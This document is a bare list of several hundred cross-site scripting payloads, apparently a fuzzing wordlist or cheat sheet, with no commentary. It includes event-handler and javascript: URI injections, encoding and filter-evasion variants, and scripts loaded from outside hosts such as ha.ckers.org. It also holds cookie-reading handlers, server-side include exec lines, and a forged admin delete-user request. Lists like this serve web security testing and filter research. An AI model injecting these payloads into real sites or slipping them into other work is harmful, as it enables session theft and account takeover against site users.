<BODY onload!#$%%&()*~+-_.,:;?@[/|\]^`=javascript:alert(1)> | |
<SCRIPT/SRC="%(jscript)s"></SCRIPT> | |
<<SCRIPT>%(payload)s//<</SCRIPT> | |
<IMG SRC="javascript:javascript:alert(1)" | |
<iframe src=%(scriptlet)s < | |
<INPUT TYPE="IMAGE" SRC="javascript:javascript:alert(1);"> | |
<IMG DYNSRC="javascript:javascript:alert(1)"> | |
<IMG LOWSRC="javascript:javascript:alert(1)"> | |
<BGSOUND SRC="javascript:javascript:alert(1);"> | |
<BR SIZE="&{javascript:alert(1)}"> | |
<LAYER SRC="%(scriptlet)s"></LAYER> | |
<LINK REL="stylesheet" HREF="javascript:javascript:alert(1);"> | |
<STYLE>@import'%(css)s';</STYLE> | |
<META HTTP-EQUIV="Link" Content="<%(css)s>; REL=stylesheet"> | |
<XSS STYLE="behavior: url(%(htc)s);"> | |
<STYLE>li {list-style-image: url("javascript:javascript:alert(1)");}</STYLE><UL><LI>XSS | |
<META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:javascript:alert(1);"> | |
<META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:javascript:alert(1);"> | |
<IFRAME SRC="javascript:javascript:alert(1);"></IFRAME> | |
<TABLE BACKGROUND="javascript:javascript:alert(1)"> | |
<TABLE><TD BACKGROUND="javascript:javascript:alert(1)"> | |
<DIV STYLE="background-image: url(javascript:javascript:alert(1))"> | |
<DIV STYLE="width:expression(javascript:alert(1));"> | |
<IMG STYLE="xss:expr/*XSS*/ession(javascript:alert(1))"> | |
<XSS STYLE="xss:expression(javascript:alert(1))"> | |
<STYLE TYPE="text/javascript">javascript:alert(1);</STYLE> | |
<STYLE>.XSS{background-image:url("javascript:javascript:alert(1)");}</STYLE><A CLASS=XSS></A> | |
<STYLE type="text/css">BODY{background:url("javascript:javascript:alert(1)")}</STYLE> | |
<!--[if gte IE 4]><SCRIPT>javascript:alert(1);</SCRIPT><![endif]--> | |
<BASE HREF="javascript:javascript:alert(1);//"> | |
<OBJECT TYPE="text/x-scriptlet" DATA="%(scriptlet)s"></OBJECT> | |
<OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389><param name=url value=javascript:javascript:alert(1)></OBJECT> | |
<HTML xmlns:xss><?import namespace="xss" implementation="%(htc)s"><xss:xss>XSS</xss:xss></HTML>""","XML namespace."),("""<XML ID="xss"><I><B><IMG SRC="javas<!-- -->cript:javascript:alert(1)"></B></I></XML><SPAN DATASRC="#xss" DATAFLD="B" DATAFORMATAS="HTML"></SPAN> | |
<HTML><BODY><?xml:namespace prefix="t" ns="urn:schemas-microsoft-com:time"><?import namespace="t" implementation="#default#time2"><t:set attributeName="innerHTML" to="XSS<SCRIPT DEFER>javascript:alert(1)</SCRIPT>"></BODY></HTML> | |
<SCRIPT SRC="%(jpg)s"></SCRIPT> | |
<HEAD><META HTTP-EQUIV="CONTENT-TYPE" CONTENT="text/html; charset=UTF-7"> </HEAD>+ADw-SCRIPT+AD4-%(payload)s;+ADw-/SCRIPT+AD4- | |
<form id="test" /><button form="test" formaction="javascript:javascript:alert(1)">X | |
<body onscroll=javascript:alert(1)><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><input autofocus> | |
<P STYLE="behavior:url('#default#time2')" end="0" onEnd="javascript:alert(1)"> | |
<STYLE>@import'%(css)s';</STYLE> | |
<STYLE>a{background:url('s1' 's2)}@import javascript:javascript:alert(1);');}</STYLE> | |
<meta charset= "x-imap4-modified-utf7"&&>&&<script&&>javascript:alert(1)&&;&&<&&/script&&> | |
<SCRIPT onreadystatechange=javascript:javascript:alert(1);></SCRIPT> | |
<style onreadystatechange=javascript:javascript:alert(1);></style> | |
<?xml version="1.0"?><html:html xmlns:html='http://www.w3.org/1999/xhtml'><html:script>javascript:alert(1);</html:script></html:html> | |
<embed code=%(scriptlet)s></embed> | |
<embed code=javascript:javascript:alert(1);></embed> | |
<embed src=%(jscript)s></embed> | |
<frameset onload=javascript:javascript:alert(1)></frameset> | |
<object onerror=javascript:javascript:alert(1)> | |
<embed type="image" src=%(scriptlet)s></embed> | |
<XML ID=I><X><C><![CDATA[<IMG SRC="javas]]<![CDATA[cript:javascript:alert(1);">]]</C><X></xml> | |
<IMG SRC=&{javascript:alert(1);};> | |
<a href="javAascript:javascript:alert(1)">test1</a> | |
<a href="javaascript:javascript:alert(1)">test1</a> | |
<embed width=500 height=500 code="data:text/html,<script>%(payload)s</script>"></embed> | |
<iframe srcdoc="<iframe/srcdoc=&lt;img/src=&apos;&apos;onerror=javascript:alert(1)&gt;>"> | |
';alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//"; | |
alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//-- | |
></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT> | |
'';!--"<XSS>=&{()} | |
<SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT> | |
<IMG SRC="javascript:alert('XSS');"> | |
<IMG SRC=javascript:alert('XSS')> | |
<IMG SRC=JaVaScRiPt:alert('XSS')> | |
<IMG SRC=javascript:alert("XSS")> | |
<IMG SRC=`javascript:alert("RSnake says, 'XSS'")`> | |
<a onmouseover="alert(document.cookie)">xxs link</a> | |
<a onmouseover=alert(document.cookie)>xxs link</a> | |
<IMG """><SCRIPT>alert("XSS")</SCRIPT>"> | |
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))> | |
<IMG SRC=# onmouseover="alert('xxs')"> | |
<IMG SRC= onmouseover="alert('xxs')"> | |
<IMG onmouseover="alert('xxs')"> | |
<IMG SRC=javascript:alert('XSS')> | |
<IMG SRC=javascript:alert('XSS')> | |
<IMG SRC=javascript:alert('XSS')> | |
<IMG SRC="jav ascript:alert('XSS');"> | |
<IMG SRC="jav	ascript:alert('XSS');"> | |
<IMG SRC="jav
ascript:alert('XSS');"> | |
<IMG SRC="jav
ascript:alert('XSS');"> | |
perl -e 'print "<IMG SRC=java\0script:alert(\"XSS\")>";' > out | |
<IMG SRC="  javascript:alert('XSS');"> | |
<SCRIPT/XSS SRC="http://ha.ckers.org/xss.js"></SCRIPT> | |
<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("XSS")> | |
<SCRIPT/SRC="http://ha.ckers.org/xss.js"></SCRIPT> | |
<<SCRIPT>alert("XSS");//<</SCRIPT> | |
<SCRIPT SRC=http://ha.ckers.org/xss.js?< B > | |
<SCRIPT SRC=//ha.ckers.org/.j> | |
<IMG SRC="javascript:alert('XSS')" | |
<iframe src=http://ha.ckers.org/scriptlet.html < | |
\";alert('XSS');// | |
</TITLE><SCRIPT>alert("XSS");</SCRIPT> | |
<INPUT TYPE="IMAGE" SRC="javascript:alert('XSS');"> | |
<BODY BACKGROUND="javascript:alert('XSS')"> | |
<IMG DYNSRC="javascript:alert('XSS')"> | |
<IMG LOWSRC="javascript:alert('XSS')"> | |
<STYLE>li {list-style-image: url("javascript:alert('XSS')");}</STYLE><UL><LI>XSS</br> | |
<IMG SRC='vbscript:msgbox("XSS")'> | |
<IMG SRC="livescript:[code]"> | |
<BODY ONLOAD=alert('XSS')> | |
<BGSOUND SRC="javascript:alert('XSS');"> | |
<BR SIZE="&{alert('XSS')}"> | |
<LINK REL="stylesheet" HREF="javascript:alert('XSS');"> | |
<LINK REL="stylesheet" HREF="http://ha.ckers.org/xss.css"> | |
<STYLE>@import'http://ha.ckers.org/xss.css';</STYLE> | |
<META HTTP-EQUIV="Link" Content="<http://ha.ckers.org/xss.css>; REL=stylesheet"> | |
<STYLE>BODY{-moz-binding:url("http://ha.ckers.org/xssmoz.xml#xss")}</STYLE> | |
<STYLE>@im\port'\ja\vasc\ript:alert("XSS")';</STYLE> | |
<IMG STYLE="xss:expr/*XSS*/ession(alert('XSS'))"> | |
exp/*<A STYLE='no\xss:noxss("*//*");xss:ex/*XSS*//*/*/pression(alert("XSS"))'> | |
<STYLE TYPE="text/javascript">alert('XSS');</STYLE> | |
<STYLE>.XSS{background-image:url("javascript:alert('XSS')");}</STYLE><A CLASS=XSS></A> | |
<STYLE type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE> | |
<STYLE type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE> | |
<XSS STYLE="xss:expression(alert('XSS'))"> | |
<XSS STYLE="behavior: url(xss.htc);"> | |
¼script¾alert(¢XSS¢)¼/script¾ | |
<META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert('XSS');"> | |
<META HTTP-EQUIV="refresh" CONTENT="0;url=data:text/html base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K"> | |
<META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:alert('XSS');"> | |
<IFRAME SRC="javascript:alert('XSS');"></IFRAME> | |
<IFRAME SRC=# onmouseover="alert(document.cookie)"></IFRAME> | |
<FRAMESET><FRAME SRC="javascript:alert('XSS');"></FRAMESET> | |
<TABLE BACKGROUND="javascript:alert('XSS')"> | |
<TABLE><TD BACKGROUND="javascript:alert('XSS')"> | |
<DIV STYLE="background-image: url(javascript:alert('XSS'))"> | |
<DIV STYLE="background-image:\0075\0072\006C\0028'\006a\0061\0076\0061\0073\0063\0072\0069\0070\0074\003a\0061\006c\0065\0072\0074\0028.1027\0058.1053\0053\0027\0029'\0029"> | |
<DIV STYLE="background-image: url(javascript:alert('XSS'))"> | |
<DIV STYLE="width: expression(alert('XSS'));"> | |
<BASE HREF="javascript:alert('XSS');//"> | |
<OBJECT TYPE="text/x-scriptlet" DATA="http://ha.ckers.org/scriptlet.html"></OBJECT> | |
<EMBED SRC="data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dH A6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcv MjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hs aW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAw IiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoIlh TUyIpOzwvc2NyaXB0Pjwvc3ZnPg==" type="image/svg+xml" AllowScriptAccess="always"></EMBED> | |
<SCRIPT SRC="http://ha.ckers.org/xss.jpg"></SCRIPT> | |
<!--#exec cmd="/bin/echo '<SCR'"--><!--#exec cmd="/bin/echo 'IPT SRC=http://ha.ckers.org/xss.js></SCRIPT>'"--> | |
<? echo('<SCR)';echo('IPT>alert("XSS")</SCRIPT>'); ?> | |
<IMG SRC="http://www.thesiteyouareon.com/somecommand.php?somevariables=maliciouscode"> | |
Redirect 302 /a.jpg http://victimsite.com/admin.asp&deleteuser | |
<META HTTP-EQUIV="Set-Cookie" Content="USERID=<SCRIPT>alert('XSS')</SCRIPT>"> | |
<HEAD><META HTTP-EQUIV="CONTENT-TYPE" CONTENT="text/html; charset=UTF-7"> </HEAD>+ADw-SCRIPT+AD4-alert('XSS');+ADw-/SCRIPT+AD4- | |
<SCRIPT a=">" SRC="http://ha.ckers.org/xss.js"></SCRIPT> | |
<SCRIPT =">" SRC="http://ha.ckers.org/xss.js"></SCRIPT> | |
<SCRIPT a=">" '' SRC="http://ha.ckers.org/xss.js"></SCRIPT> | |
<SCRIPT "a='>'" SRC="http://ha.ckers.org/xss.js"></SCRIPT> | |
<SCRIPT a=`>` SRC="http://ha.ckers.org/xss.js"></SCRIPT> | |
<SCRIPT a=">'>" SRC="http://ha.ckers.org/xss.js"></SCRIPT> | |
<SCRIPT>document.write("<SCRI");</SCRIPT>PT SRC="http://ha.ckers.org/xss.js"></SCRIPT> | |
<A HREF="http://66.102.7.147/">XSS</A> | |
<A HREF="http://%77%77%77%2E%67%6F%6F%67%6C%65%2E%63%6F%6D">XSS</A> | |
<A HREF="http://1113982867/">XSS</A> | |
<A HREF="http://0x42.0x0000066.0x7.0x93/">XSS</A> | |
<A HREF="http://0102.0146.0007.00000223/">XSS</A> | |
<A HREF="htt p://6 6.000146.0x7.147/">XSS</A> | |
<iframe %00 src="	javascript:prompt(1)	"%00> | |
<svg><style>{font-family:'<iframe/onload=confirm(1)>' | |
<input/onmouseover="javaSCRIPT:confirm(1)" | |
<sVg><scRipt %00>alert(1) {Opera} | |
<img/src=`%00` onerror=this.onerror=confirm(1) | |
<form><isindex formaction="javascript:confirm(1)" | |
<img src=`%00`
 onerror=alert(1)
 | |
<script/	 src='https://dl.dropbox.com/u/13018058/js.js' /	></script> | |
<ScRipT 5-0*3+9/3=>prompt(1)</ScRipT giveanswerhere=? | |
<iframe/src="data:text/html;	base64	,PGJvZHkgb25sb2FkPWFsZXJ0KDEpPg=="> | |
<script /*%00*/>/*%00*/alert(1)/*%00*/</script /*%00*/ | |
"><h1/onmouseover='\u0061lert(1)'>%00 | |
<iframe/src="data:text/html,<svg onload=alert(1)>"> | |
<meta content="
 1 
; JAVASCRIPT: alert(1)" http-equiv="refresh"/> | |
<svg><script xlink:href=data:,window.open('https://www.google.com/')></script | |
<svg><script x:href='https://dl.dropbox.com/u/13018058/js.js' {Opera} | |
<meta http-equiv="refresh" content="0;url=javascript:confirm(1)"> | |
<iframe src=javascript:alert(document.location)> | |
<form><a href="javascript:\u0061lert(1)">X | |
</script><img/*%00/src="worksinchrome:prompt(1)"/%00*/onerror='eval(src)'> | |
<img/	  src=`~` onerror=prompt(1)> | |
<form><iframe 	  src="javascript:alert(1)" 	;> | |
<a href="data:application/x-x509-user-cert;
base64
,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg=="	 >X</a | |
http://www.google<script .com>alert(document.location)</script | |
<a href=[�]"� onmouseover=prompt(1)//">XYZ</a | |
<img/src=@  onerror = prompt('1') | |
<style/onload=prompt('XSS') | |
<script ^__^>alert(String.fromCharCode(49))</script ^__^ | |
</style  ><script   :-(>/**/alert(document.location)/**/</script   :-( | |
�</form><input type="date" onfocus="alert(1)"> | |
<form><textarea onkeyup='\u0061\u006C\u0065\u0072\u0074(1)'> | |
<script /***/>/***/confirm('\uFF41\uFF4C\uFF45\uFF52\uFF54\u1455\uFF11\u1450')/***/</script /***/ | |
<iframe srcdoc='<body onload=prompt(1)>'> | |
<a href="javascript:void(0)" onmouseover=
javascript:alert(1)
>X</a> | |
<script ~~~>alert(0%0)</script ~~~> | |
<style/onload=<!--	> alert (1)> | |
<///style///><span %2F onmousemove='alert(1)'>SPAN | |
<img/src='http://i.imgur.com/P8mL8.jpg' onmouseover=	prompt(1) | |
"><svg><style>{-o-link-source:'<body/onload=confirm(1)>' | |
<blink/ onmouseover=prompt(1)>OnMouseOver {Firefox & Opera} | |
<marquee onstart='javascript:alert(1)'>^__^ | |
<div/style="width:expression(confirm(1))">X</div> {IE7} | |
<iframe/%00/ src=javaSCRIPT:alert(1) | |
//<form/action=javascript:alert(document.cookie)><input/type='submit'>// | |
/*iframe/src*/<iframe/src="<iframe/src=@"/onload=prompt(1) /*iframe/src*/> | |
//|\\ <script //|\\ src='https://dl.dropbox.com/u/13018058/js.js'> //|\\ </script //|\\ | |
</font>/<svg><style>{src:'<style/onload=this.onload=confirm(1)>'</font>/</style> | |
<a/href="javascript: javascript:prompt(1)"><input type="X"> | |
</plaintext\></|\><plaintext/onmouseover=prompt(1) | |
</svg>''<svg><script 'AQuickBrownFoxJumpsOverTheLazyDog'>alert(1) {Opera} | |
<a href="javascript:\u0061le%72t(1)"><button> | |
<div onmouseover='alert(1)'>DIV</div> | |
<iframe style="position:absolute;top:0;left:0;width:100%;height:100%" onmouseover="prompt(1)"> | |
<a href="jAvAsCrIpT:alert(1)">X</a> | |
<embed src="http://corkami.googlecode.com/svn/!svn/bc/480/trunk/misc/pdf/helloworld_js_X.pdf"> | |
<object data="http://corkami.googlecode.com/svn/!svn/bc/480/trunk/misc/pdf/helloworld_js_X.pdf"> | |
<var onmouseover="prompt(1)">On Mouse Over</var> | |
<a href=javascript:alert(document.cookie)>Click Here</a> | |
<img src="/" =_=" title="onerror='prompt(1)'"> | |
<%<!--'%><script>alert(1);</script --> | |
<script src="data:text/javascript,alert(1)"></script> | |
<iframe/src \/\/onload = prompt(1) | |
<iframe/onreadystatechange=alert(1) | |
<svg/onload=alert(1) | |
<input value=<><iframe/src=javascript:confirm(1) | |
<input type="text" value=`` <div/onmouseover='alert(1)'>X</div> | |
http://www.<script>alert(1)</script .com | |
<iframe src=j
	a
		v
			a
				s
					c
						r
							i
								p
									t
										:a
											l
												e
													r
														t
															28
																1
																	%29></iframe> | |
<svg><script ?>alert(1) | |
<iframe src=j	a	v	a	s	c	r	i	p	t	:a	l	e	r	t	%28	1	%29></iframe> | |
<img src=`xx:xx`onerror=alert(1)> | |
<object type="text/x-scriptlet" data="http://jsfiddle.net/XLE63/ "></object> | |
<meta http-equiv="refresh" content="0;javascript:alert(1)"/> | |
<math><a xlink:href="//jsfiddle.net/t846h/">click | |
<embed code="http://businessinfo.co.uk/labs/xss/xss.swf" allowscriptaccess=always> | |
<svg contentScriptType=text/vbs><script>MsgBox+1 | |
<a href="data:text/html;base64_,<svg/onload=\u0061le%72t(1)>">X</a | |
<iframe/onreadystatechange=\u0061\u006C\u0065\u0072\u0074('\u0061') worksinIE> | |
<script>~'\u0061' ; \u0074\u0068\u0072\u006F\u0077 ~ \u0074\u0068\u0069\u0073. \u0061\u006C\u0065\u0072\u0074(~'\u0061')</script U+ | |
<script/src="data:text%2Fj\u0061v\u0061script,\u0061lert('\u0061')"></script a=\u0061 & /=%2F | |
<script/src=data:text/j\u0061v\u0061script,\u0061%6C%65%72%74(/XSS/)></script | |
<object data=javascript:\u0061le%72t(1)> | |
<script>+-+-1-+-+alert(1)</script> | |
<body/onload=<!-->
alert(1)> | |
<script itworksinallbrowsers>/*<script* */alert(1)</script | |
<img src ?itworksonchrome?\/onerror = alert(1) | |
<svg><script>//
confirm(1);</script </svg> | |
<svg><script onlypossibleinopera:-)> alert(1) | |
<a aa aaa aaaa aaaaa aaaaaa aaaaaaa aaaaaaaa aaaaaaaaa aaaaaaaaaa href=javascript:alert(1)>ClickMe | |
<script x> alert(1) </script 1=2 | |
<div/onmouseover='alert(1)'> style="x:"> | |
<--`<img/src=` onerror=alert(1)> --!> | |
<script/src=data:text/javascript,alert(1)></script> | |
<div style="position:absolute;top:0;left:0;width:100%;height:100%" onmouseover="prompt(1)" onclick="alert(1)">x</button> | |
"><img src=x onerror=window.open('https://www.google.com/');> | |
<form><button formaction=javascript:alert(1)>CLICKME | |
<math><a xlink:href="//jsfiddle.net/t846h/">click | |
<object data=data:text/html;base64,PHN2Zy9vbmxvYWQ9YWxlcnQoMik+></object> | |
<iframe src="data:text/html,%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%31%29%3C%2F%73%63%72%69%70%74%3E"></iframe> | |
<a href="data:text/html;blabla,<script src="http://sternefamily.net/foo.js"></script>​">Click Me</a> | |
%253Cscript%253Ealert('XSS')%253C%252Fscript%253E | |
<IMG SRC=x onload="alert(String.fromCharCode(88,83,83))"> | |
<IMG SRC=x onafterprint="alert(String.fromCharCode(88,83,83))"> | |
<IMG SRC=x onbeforeprint="alert(String.fromCharCode(88,83,83))"> | |
<IMG SRC=x onbeforeunload="alert(String.fromCharCode(88,83,83))"> | |
<IMG SRC=x onerror="alert(String.fromCharCode(88,83,83))"> | |
<IMG SRC=x onhashchange="alert(String.fromCharCode(88,83,83))"> | |
<IMG SRC=x onload="alert(String.fromCharCode(88,83,83))"> | |
<IMG SRC=x onmessage="alert(String.fromCharCode(88,83,83))"> | |
<IMG SRC=x ononline="alert(String.fromCharCode(88,83,83))"> | |
<IMG SRC=x onoffline="alert(String.fromCharCode(88,83,83))"> | |
<IMG SRC=x onpagehide="alert(String.fromCharCode(88,83,83))"> | |
<IMG SRC=x onpageshow="alert(String.fromCharCode(88,83,83))"> | |
<IMG SRC=x onpopstate="alert(String.fromCharCode(88,83,83))"> | |
<IMG SRC=x onresize="alert(String.fromCharCode(88,83,83))"> | |
<IMG SRC=x onstorage="alert(String.fromCharCode(88,83,83))"> | |
<IMG SRC=x onunload="alert(String.fromCharCode(88,83,83))"> | |
<IMG SRC=x onblur="alert(String.fromCharCode(88,83,83))"> | |
<IMG SRC=x onchange="alert(String.fromCharCode(88,83,83))"> | |
<IMG SRC=x oncontextmenu="alert(String.fromCharCode(88,83,83))"> | |
<IMG SRC=x oninput="alert(String.fromCharCode(88,83,83))"> | |
<IMG SRC=x oninvalid="alert(String.fromCharCode(88,83,83))"> | |
<IMG SRC=x onreset="alert(String.fromCharCode(88,83,83))"> | |
<IMG SRC=x onsearch="alert(String.fromCharCode(88,83,83))"> | |
<IMG SRC=x onselect="alert(String.fromCharCode(88,83,83))"> | |
<IMG SRC=x onsubmit="alert(String.fromCharCode(88,83,83))"> | |
<IMG SRC=x onkeydown="alert(String.fromCharCode(88,83,83))"> | |
<IMG SRC=x onkeypress="alert(String.fromCharCode(88,83,83))"> | |
<IMG SRC=x onkeyup="alert(String.fromCharCode(88,83,83))"> | |
<IMG SRC=x onclick="alert(String.fromCharCode(88,83,83))"> | |
<IMG SRC=x ondblclick="alert(String.fromCharCode(88,83,83))"> | |
<IMG SRC=x onmousedown="alert(String.fromCharCode(88,83,83))"> | |
<IMG SRC=x onmousemove="alert(String.fromCharCode(88,83,83))"> | |
<IMG SRC=x onmouseout="alert(String.fromCharCode(88,83,83))"> | |
<IMG SRC=x onmouseover="alert(String.fromCharCode(88,83,83))"> | |
<IMG SRC=x onmouseup="alert(String.fromCharCode(88,83,83))"> | |
<IMG SRC=x onmousewheel="alert(String.fromCharCode(88,83,83))"> | |
<IMG SRC=x onwheel="alert(String.fromCharCode(88,83,83))"> | |
<IMG SRC=x ondrag="alert(String.fromCharCode(88,83,83))"> | |
<IMG SRC=x ondragend="alert(String.fromCharCode(88,83,83))"> | |
<IMG SRC=x ondragenter="alert(String.fromCharCode(88,83,83))"> | |
<IMG SRC=x ondragleave="alert(String.fromCharCode(88,83,83))"> | |
<IMG SRC=x ondragover="alert(String.fromCharCode(88,83,83))"> | |
<IMG SRC=x ondragstart="alert(String.fromCharCode(88,83,83))"> | |
<IMG SRC=x ondrop="alert(String.fromCharCode(88,83,83))"> | |
<IMG SRC=x onscroll="alert(String.fromCharCode(88,83,83))"> | |
<IMG SRC=x oncopy="alert(String.fromCharCode(88,83,83))"> | |
<IMG SRC=x oncut="alert(String.fromCharCode(88,83,83))"> | |
<IMG SRC=x onpaste="alert(String.fromCharCode(88,83,83))"> | |
<IMG SRC=x onabort="alert(String.fromCharCode(88,83,83))"> | |
<IMG SRC=x oncanplay="alert(String.fromCharCode(88,83,83))"> | |
<IMG SRC=x oncanplaythrough="alert(String.fromCharCode(88,83,83))"> | |
<IMG SRC=x oncuechange="alert(String.fromCharCode(88,83,83))"> | |
<IMG SRC=x ondurationchange="alert(String.fromCharCode(88,83,83))"> | |
<IMG SRC=x onemptied="alert(String.fromCharCode(88,83,83))"> | |
<IMG SRC=x onended="alert(String.fromCharCode(88,83,83))"> | |
<IMG SRC=x onerror="alert(String.fromCharCode(88,83,83))"> | |
<IMG SRC=x onloadeddata="alert(String.fromCharCode(88,83,83))"> | |
<IMG SRC=x onloadedmetadata="alert(String.fromCharCode(88,83,83))"> | |
<IMG SRC=x onloadstart="alert(String.fromCharCode(88,83,83))"> | |
<IMG SRC=x onpause="alert(String.fromCharCode(88,83,83))"> | |
<IMG SRC=x onplay="alert(String.fromCharCode(88,83,83))"> | |
<IMG SRC=x onplaying="alert(String.fromCharCode(88,83,83))"> | |
<IMG SRC=x onprogress="alert(String.fromCharCode(88,83,83))"> | |
<IMG SRC=x onratechange="alert(String.fromCharCode(88,83,83))"> | |
<IMG SRC=x onseeked="alert(String.fromCharCode(88,83,83))"> | |
<IMG SRC=x onseeking="alert(String.fromCharCode(88,83,83))"> | |
<IMG SRC=x onstalled="alert(String.fromCharCode(88,83,83))"> | |
<IMG SRC=x onsuspend="alert(String.fromCharCode(88,83,83))"> | |
<IMG SRC=x ontimeupdate="alert(String.fromCharCode(88,83,83))"> | |
<IMG SRC=x onvolumechange="alert(String.fromCharCode(88,83,83))"> | |
<IMG SRC=x onwaiting="alert(String.fromCharCode(88,83,83))"> | |
<IMG SRC=x onshow="alert(String.fromCharCode(88,83,83))"> | |
<IMG SRC=x ontoggle="alert(String.fromCharCode(88,83,83))"> | |
<META onpaonpageonpagonpageonpageshowshoweshowshowgeshow="alert(1)"; | |
<IMG SRC=x onload="alert(String.fromCharCode(88,83,83))"> | |
<INPUT TYPE="BUTTON" action="alert('XSS')"/> | |
"><h1><IFRAME SRC="javascript:alert('XSS');"></IFRAME>">123</h1> | |
"><h1><IFRAME SRC=# onmouseover="alert(document.cookie)"></IFRAME>123</h1> | |
<IFRAME SRC="javascript:alert('XSS');"></IFRAME> | |
<IFRAME SRC=# onmouseover="alert(document.cookie)"></IFRAME> | |
"><h1><IFRAME SRC=# onmouseover="alert(document.cookie)"></IFRAME>123</h1> | |
"></iframe><script>alert(`TEXT YOU WANT TO BE DISPLAYED`);</script><iframe frameborder="0%EF%BB%BF | |
"><h1><IFRAME width="420" height="315" SRC="http://www.youtube.com/embed/sxvccpasgTE" frameborder="0" onmouseover="alert(document.cookie)"></IFRAME>123</h1> | |
"><h1><iframe width="420" height="315" src="http://www.youtube.com/embed/sxvccpasgTE" frameborder="0" allowfullscreen></iframe>123</h1> | |
><h1><IFRAME width="420" height="315" frameborder="0" onmouseover="document.location.href='https://www.youtube.com/channel/UC9Qa_gXarSmObPX3ooIQZr | |
g'"></IFRAME>Hover the cursor to the LEFT of this Message</h1>&ParamHeight=250 | |
<IFRAME width="420" height="315" frameborder="0" onload="alert(document.cookie)"></IFRAME> | |
"><h1><IFRAME SRC="javascript:alert('XSS');"></IFRAME>">123</h1> | |
"><h1><IFRAME SRC=# onmouseover="alert(document.cookie)"></IFRAME>123</h1> | |
<iframe src=http://xss.rocks/scriptlet.html < | |
<IFRAME SRC="javascript:alert('XSS');"></IFRAME> | |
<IFRAME SRC=# onmouseover="alert(document.cookie)"></IFRAME> | |
<iframe src="	javascript:prompt(1)	"> | |
<svg><style>{font-family:'<iframe/onload=confirm(1)>' | |
<input/onmouseover="javaSCRIPT:confirm(1)" | |
<sVg><scRipt >alert(1) {Opera} | |
<img/src=`` onerror=this.onerror=confirm(1) | |
<form><isindex formaction="javascript:confirm(1)" | |
<img src=``
 onerror=alert(1)
 | |
<script/	 src='https://dl.dropbox.com/u/13018058/js.js' /	></script> | |
<ScRipT 5-0*3+9/3=>prompt(1)</ScRipT giveanswerhere=? | |
<iframe/src="data:text/html;	base64	,PGJvZHkgb25sb2FkPWFsZXJ0KDEpPg=="> | |
<script /**/>/**/alert(1)/**/</script /**/ | |
"><h1/onmouseover='\u0061lert(1)'> | |
<iframe/src="data:text/html,<svg onload=alert(1)>"> | |
<meta content="
 1 
; JAVASCRIPT: alert(1)" http-equiv="refresh"/> | |
<svg><script xlink:href=data:,window.open('https://www.google.com/') </script | |
<svg><script x:href='https://dl.dropbox.com/u/13018058/js.js' {Opera} | |
<meta http-equiv="refresh" content="0;url=javascript:confirm(1)"> | |
<iframe src=javascript:alert(document.location)> | |
<form><a href="javascript:\u0061lert(1)">X</script><img/*/src="worksinchrome:prompt(1)"/*/onerror='eval(src)'> | |
<img/	  src=`~` onerror=prompt(1)> | |
<form><iframe 	  src="javascript:alert(1)" 	;> | |
<a href="data:application/x-x509-user-cert;
base64
,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg=="	 >X</a | |
http://www.google<script .com>alert(document.location)</script | |
<a href=[�]"� onmouseover=prompt(1)//">XYZ</a | |
<img/src=@  onerror = prompt('1') | |
<style/onload=prompt('XSS') | |
<script ^__^>alert(String.fromCharCode(49))</script ^__^ | |
</style  ><script   :-(>/**/alert(document.location)/**/</script   :-( | |
�</form><input type="date" onfocus="alert(1)"> | |
<form><textarea onkeyup='\u0061\u006C\u0065\u0072\u0074(1)'> | |
<script /***/>/***/confirm('\uFF41\uFF4C\uFF45\uFF52\uFF54\u1455\uFF11\u1450')/***/</script /***/ | |
<iframe srcdoc='<body onload=prompt(1)>'> | |
<a href="javascript:void(0)" onmouseover=
javascript:alert(1)
>X</a> | |
<script ~~~>alert(0%0)</script ~~~> | |
<style/onload=<!--	> alert (1)> | |
<///style///><span %2F onmousemove='alert(1)'>SPAN | |
<img/src='http://i.imgur.com/P8mL8.jpg' onmouseover=	prompt(1) | |
"><svg><style>{-o-link-source:'<body/onload=confirm(1)>' | |
<blink/ onmouseover=prompt(1)>OnMouseOver {Firefox & Opera} | |
<marquee onstart='javascript:alert(1)'>^__^ | |
<div/style="width:expression(confirm(1))">X</div> {IE7} | |
<iframe// src=javaSCRIPT:alert(1) | |
//<form/action=javascript:alert(document.cookie)><input/type='submit'>// | |
/*iframe/src*/<iframe/src="<iframe/src=@"/onload=prompt(1) /*iframe/src*/> | |
//|\\ <script //|\\ src='https://dl.dropbox.com/u/13018058/js.js'> //|\\ </script //|\\ | |
</font>/<svg><style>{src:'<style/onload=this.onload=confirm(1)>'</font>/</style> | |
<a/href="javascript: javascript:prompt(1)"><input type="X"> | |
</plaintext\></|\><plaintext/onmouseover=prompt(1) | |
</svg>''<svg><script 'AQuickBrownFoxJumpsOverTheLazyDog'>alert(1) {Opera} | |
<a href="javascript:\u0061le%72t(1)"><button> | |
<div onmouseover='alert(1)'>DIV</div> | |
